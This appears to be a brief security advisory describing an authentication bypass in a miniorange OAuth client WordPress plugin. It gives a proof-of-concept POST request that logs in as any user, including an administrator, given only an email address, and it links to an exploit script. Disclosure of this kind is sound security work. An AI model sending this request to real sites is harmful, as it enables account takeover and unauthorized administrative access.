The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the client’s website.
Proof of Concept
POST /vdb/miniorange-oauth-client/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

option=mooauth&[email protected]
Exploit script: https://gist.github.com/lana-codes/4ee8c5fc44f91e2e99ab1b215718cf71